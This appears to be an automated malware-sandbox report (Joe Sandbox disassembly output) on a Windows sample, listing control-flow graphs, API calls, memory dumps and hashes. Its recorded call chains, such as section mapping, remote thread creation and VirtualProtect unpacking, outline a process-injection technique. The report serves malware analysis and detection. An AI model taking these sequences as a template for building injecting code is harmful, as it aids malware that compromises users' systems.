                                        control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 266->267 273 4018c5 267->273 274 4018bc-4018e3 call 401193 267->274 273->274 276->266 278 4015e1-401605 NtCreateSection 276->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 284 40168d-401691 280->284 281->280 282 40162a-401646 NtMapViewOfSection 281->282 282->280 285 401648-40165e 282->285 284->266 286 401697-4016b8 NtMapViewOfSection 284->286 285->280 286->266 288 4016be-4016da NtMapViewOfSection 286->288 288->266 291 4016e0 call 4016e5 288->291
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 305->306 312 4018c5 306->312 313 4018bc-4018e3 call 401193 306->313 312->313 315->305 317 4015e1-401605 NtCreateSection 315->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 323 40168d-401691 319->323 320->319 321 40162a-401646 NtMapViewOfSection 320->321 321->319 324 401648-40165e 321->324 323->305 325 401697-4016b8 NtMapViewOfSection 323->325 324->319 325->305 327 4016be-4016da NtMapViewOfSection 325->327 327->305 330 4016e0 call 4016e5 327->330
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 345->346 352 4018c5 346->352 353 4018bc-4018e3 call 401193 346->353 352->353 355->345 357 4015e1-401605 NtCreateSection 355->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 363 40168d-401691 359->363 360->359 361 40162a-401646 NtMapViewOfSection 360->361 361->359 364 401648-40165e 361->364 363->345 365 401697-4016b8 NtMapViewOfSection 363->365 364->359 365->345 367 4016be-4016da NtMapViewOfSection 365->367 367->345 370 4016e0 call 4016e5 367->370
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-403038 407->409 410 403062-403065 408->410 411 403042-403061 408->411 409->408 412 403067-40306a 410->412 413 40306e 410->413 411->410 412->413 414 40306c 412->414 413->405 415 403070-403075 413->415 414->415 415->403 416 403077-40307a 415->416 416->403 417 40307c-4030eb RtlCreateUserThread NtTerminateProcess 416->417 417->403
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: CreateProcessTerminateThreadUser
                                        • String ID:
                                        • API String ID: 1921587553-0
                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 417090-4170b8 2 4170c0-4170c7 0->2 3 4170c9-4170cb 2->3 4 4170cf-4170d5 2->4 3->4 5 4170d7-4170e1 4->5 6 4170e6-4170f0 4->6 5->6 7 4170f2-4170fe 6->7 8 417108-41710f 6->8 7->8 8->2 9 417111-417119 8->9 11 417120-417126 9->11 12 417134-41713b 11->12 13 417128-41712e 11->13 14 417141-417148 12->14 15 41713d 12->15 13->12 14->11 16 41714a-417151 14->16 15->14 17 417157-41726e InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileA GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->17 18 41729e-4172ac 16->18 22 417270-417273 GetBoundsRect 17->22 23 417279-417280 17->23 19 4172b0-4172be SetCommState 18->19 26 4172c0-4172c7 19->26 27 4172c9-4172d0 19->27 22->23 24 417282-417289 OpenFileMappingA 23->24 25 41728f-41729b 23->25 24->25 25->18 26->19 26->27 28 4172d2-417339 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 27->28 29 41733f-41734e call 416cd0 27->29 28->29 34 417350-417361 29->34 35 41738d-417398 LoadLibraryA call 416d00 29->35 38 417370-417380 34->38 42 41739d-4173ae call 416ff0 35->42 40 417382 38->40 41 417388-41738b 38->41 40->41 41->35 41->38 47 4173b0-4173b7 42->47 48 4173c3-4173c9 47->48 49 4173b9-4173bf 47->49 50 4173d0-4173d7 48->50 51 4173cb call 416cf0 48->51 49->48 54 4173e6-4173ed 50->54 55 4173d9-4173e0 InterlockedDecrement 50->55 51->50 54->47 57 4173ef-4173ff 54->57 55->54 59 417400-417410 57->59 60 417412 59->60 61 417419-41741c 59->61 60->61 61->59 63 41741e-417429 61->63 64 417430-417435 63->64 66 417437-41743d 64->66 67 41743f-417445 64->67 66->67 68 417447-417454 66->68 67->64 67->68
                                        APIs
                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417160
                                        • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417179
                                        • FindAtomW.KERNEL32(00000000), ref: 00417180
                                        • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417188
                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004171A0
                                        • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004171C7
                                        • MoveFileA.KERNEL32(004194C8,004194A8), ref: 004171D7
                                        • GetVersionExW.KERNEL32(?), ref: 004171E4
                                        • DisconnectNamedPipe.KERNEL32(?), ref: 004171F7
                                        • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041723C
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041724B
                                        • LCMapStringA.KERNEL32(00000000,00000000,004194D8,00000000,?,00000000), ref: 00417261
                                        • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 00417273
                                        • OpenFileMappingA.KERNEL32(00000000,00000000,00419508), ref: 00417289
                                        • SetCommState.KERNELBASE(00000000,00000000), ref: 004172B4
                                        • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004172E1
                                        • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004172F2
                                        • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004172FA
                                        • LoadLibraryA.KERNELBASE(00419530), ref: 00417392
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Console$CommFile$ReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectExchangeFindFontInterlockedLengthLibraryLoadMappingModuleMoveNameNamedOpenOutputPathPipeRectSearchSizeStateTypeVersion
                                        • String ID: k`$}$
                                        • API String ID: 2133105460-956986773
                                        • Opcode ID: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
                                        • Instruction ID: cef9a39308b5a98140bcba38773e80a9b25639b08e6fbc118f284f3ebe5161b8
                                        • Opcode Fuzzy Hash: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
                                        • Instruction Fuzzy Hash: 2291E372C45528ABC721AB61EC44ADF7B78EF49351F01806EF50AA7150CB381A86CFED

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 70 477003c-4770047 71 477004c-4770263 call 4770a3f call 4770e0f call 4770d90 VirtualAlloc 70->71 72 4770049 70->72 87 4770265-4770289 call 4770a69 71->87 88 477028b-4770292 71->88 72->71 93 47702ce-47703c2 VirtualProtect call 4770cce call 4770ce7 87->93 90 47702a1-47702b0 88->90 92 47702b2-47702cc 90->92 90->93 92->90 99 47703d1-47703e0 93->99 100 47703e2-4770437 call 4770ce7 99->100 101 4770439-47704b8 VirtualFree 99->101 100->99 103 47705f4-47705fe 101->103 104 47704be-47704cd 101->104 107 4770604-477060d 103->107 108 477077f-4770789 103->108 106 47704d3-47704dd 104->106 106->103 110 47704e3-4770505 106->110 107->108 113 4770613-4770637 107->113 111 47707a6-47707b0 108->111 112 477078b-47707a3 108->112 124 4770517-4770520 110->124 125 4770507-4770515 110->125 115 47707b6-47707cb 111->115 116 477086e-47708be LoadLibraryA 111->116 112->111 114 477063e-4770648 113->114 114->108 117 477064e-477065a 114->117 119 47707d2-47707d5 115->119 123 47708c7-47708f9 116->123 117->108 122 4770660-477066a 117->122 120 47707d7-47707e0 119->120 121 4770824-4770833 119->121 127 47707e4-4770822 120->127 128 47707e2 120->128 130 4770839-477083c 121->130 129 477067a-4770689 122->129 131 4770902-477091d 123->131 132 47708fb-4770901 123->132 126 4770526-4770547 124->126 125->126 133 477054d-4770550 126->133 127->119 128->121 134 4770750-477077a 129->134 135 477068f-47706b2 129->135 130->116 136 477083e-4770847 130->136 132->131 137 4770556-477056b 133->137 138 47705e0-47705ef 133->138 134->114 139 47706b4-47706ed 135->139 140 47706ef-47706fc 135->140 141 477084b-477086c 136->141 142 4770849 136->142 144 477056f-477057a 137->144 145 477056d 137->145 138->106 139->140 146 47706fe-4770748 140->146 147 477074b 140->147 141->130 142->116 148 477057c-4770599 144->148 149 477059b-47705bb 144->149 145->138 146->147 147->129 154 47705bd-47705db 148->154 149->154 154->133
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0477024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4770000_tttcvva.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: ecd76446a7d31f787432ffb9e76f6f8b75e5e291a2e76d5d063c5755b7debd2f
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: 72527974A01269DFDB64CF68C984BACBBB1BF09304F5480D9E94DAB351DB30AA85DF14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 372 417363-41736a 373 417370-417380 372->373 374 417382 373->374 375 417388-41738b 373->375 374->375 375->373 376 41738d-4173ae LoadLibraryA call 416d00 call 416ff0 375->376 381 4173b0-4173b7 376->381 382 4173c3-4173c9 381->382 383 4173b9-4173bf 381->383 384 4173d0-4173d7 382->384 385 4173cb call 416cf0 382->385 383->382 387 4173e6-4173ed 384->387 388 4173d9-4173e0 InterlockedDecrement 384->388 385->384 387->381 390 4173ef-4173ff 387->390 388->387 391 417400-417410 390->391 392 417412 391->392 393 417419-41741c 391->393 392->393 393->391 394 41741e-417429 393->394 395 417430-417435 394->395 396 417437-41743d 395->396 397 41743f-417445 395->397 396->397 398 417447-417454 396->398 397->395 397->398
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00419530), ref: 00417392
                                        • InterlockedDecrement.KERNEL32(?), ref: 004173E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: DecrementInterlockedLibraryLoad
                                        • String ID: k`$}$
                                        • API String ID: 1728580480-956986773
                                        • Opcode ID: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
                                        • Instruction ID: 92a10e5f27b6df14f57ef87c33efa73532c21aaf5ae15a36d787c78b43c6be55
                                        • Opcode Fuzzy Hash: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
                                        • Instruction Fuzzy Hash: 71213A31D482148BC7219B20E8917EA7B30EB48325F52447FDD8997251CB385CD5CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 400 416d00-416e40 GetModuleHandleW GetProcAddress VirtualProtect
                                        APIs
                                        • GetModuleHandleW.KERNEL32(02B1AF70), ref: 00416DDF
                                        • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 00416E1C
                                        • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 00416E3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-3916222277
                                        • Opcode ID: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
                                        • Instruction ID: bfee18a85016a47b5ddbaf570877db746f2843951a7396f5e1c013fbe7522b0d
                                        • Opcode Fuzzy Hash: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
                                        • Instruction Fuzzy Hash: 4C315E559C93C4CAE301CBB8FC847553B63AB29744F408468D148CB3E2D7BA252AC76E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 418 2c60c10-2c60c29 419 2c60c2b-2c60c2d 418->419 420 2c60c34-2c60c40 CreateToolhelp32Snapshot 419->420 421 2c60c2f 419->421 422 2c60c42-2c60c48 420->422 423 2c60c50-2c60c5d Module32First 420->423 421->420 422->423 429 2c60c4a-2c60c4e 422->429 424 2c60c66-2c60c6e 423->424 425 2c60c5f-2c60c60 call 2c608cf 423->425 430 2c60c65 425->430 429->419 429->423 430->424
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C60C38
                                        • Module32First.KERNEL32(00000000,00000224), ref: 02C60C58
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c5d000_tttcvva.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: eee23764bb99da3503f479cceadf43715a99e385023f78fcff78512de612f1fa
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 9BF09635500B147FD7203BF599CCB7E76E9BF89668F100528E642E14C0DB70E9494A62

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 431 4770e0f-4770e24 SetErrorMode * 2 432 4770e26 431->432 433 4770e2b-4770e2c 431->433 432->433
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,04770223,?,?), ref: 04770E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,04770223,?,?), ref: 04770E1E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4770000_tttcvva.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 4b6e488307e436a8d64bb741689f94e5310f1786c1f5465f85b6a0ffcecc8059
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: A3D0123114512877DB003AA4DC09BCD7B1CDF09B62F408011FB0DD9180C7B0954046E5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 434 4018e6-40194b call 401193 Sleep call 40141f 448 40195a-4019a5 call 401193 434->448 449 40194d-401955 call 401514 434->449 449->448
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 463 401915-401918 464 4018c6-4018c7 463->464 465 40191a-40194b call 401193 Sleep call 40141f 463->465 466 4018d7 464->466 467 4018ce-4018e3 call 401193 464->467 477 40195a-4019a5 call 401193 465->477 478 40194d-401955 call 401514 465->478 466->467 478->477
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 492 4018f1-40194b call 401193 Sleep call 40141f 502 40195a-4019a5 call 401193 492->502 503 40194d-401955 call 401514 492->503 503->502
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C60920
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c5d000_tttcvva.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: 97a39681d0f2f472e30f7221b3bcf22674e07dea2e403afcb0c78270bb4f396d
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: F7113F79A00208EFDB01DF98C985E98BBF5AF08351F158094F948AB361D371EA50DF90
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
